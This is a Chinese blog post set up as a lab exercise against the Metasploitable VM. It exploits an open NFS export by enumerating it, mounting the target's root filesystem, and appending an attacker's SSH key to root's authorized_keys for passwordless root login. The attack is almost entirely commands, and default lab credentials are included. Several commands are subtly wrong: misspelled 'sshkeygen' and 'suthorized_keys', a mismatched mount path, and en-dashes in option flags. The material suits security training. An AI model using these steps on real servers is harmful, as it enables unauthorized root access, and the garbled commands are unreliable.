Msftables之Linux NFS共享目录配置漏洞

实验目的

1、了解Metasploitables靶机系统漏洞;

2、学习使用Metasploit。

实验原理

msftables之利用Linux NFS共享目录配置漏洞渗透。

实验内容

msftables之利用Linux NFS共享目录配置漏洞渗透。

实验环境描述

1、学生机与实验室网络直连;

2、VPC1、VPC2与实验室网络直连。

实验步骤

1、打开靶机(登陆用户名:msfadmin 密码:msfadmin),查看靶机的IP地址。

命令:ifconfig

图片描述

2、打开渗透机(登陆用户名:root 密码:toor)并查看其IP地址。

命令:ifconfig

图片描述

3、在渗透机kali上查看靶机上的nfs服务是否开启

命令:rpcinfo –p 192.168.10.100

图片描述

4、在渗透机kali上查看靶机上设置的远程共享目录列表

命令:showmount –e 192.168.10.100

图片描述

5、生成rsa公钥

命令:sshkeygen

图片描述

6、在渗透机 /tmp目录下新建文件夹msftables,以备后续挂载需求

命令:mkdir /tmp/msftables

图片描述

7、把靶机192.168.10.100的根目录挂载到渗透机上新建的/tmp/mstables/目录下;

命令:mount –o nolock –t nfs 192.168.10.100:/ /tmp/msftables/

图片描述

8、把渗透机上生成的公钥追加到靶机的authorized_keys下

命令:cat /root/.ssh/id_rsa.pub >> /tmp/msftables/root/.ssh/suthorized_keys

图片描述

9、实现无密码ssh登录

命令:ssh root@192.168.10.100

图片描述

10、 查看ip地址检测是否已登录到靶机

命令:ifconfig

图片描述

posted @ 2020-09-07 10:42  kalibb  阅读(855)  评论(0编辑  收藏  举报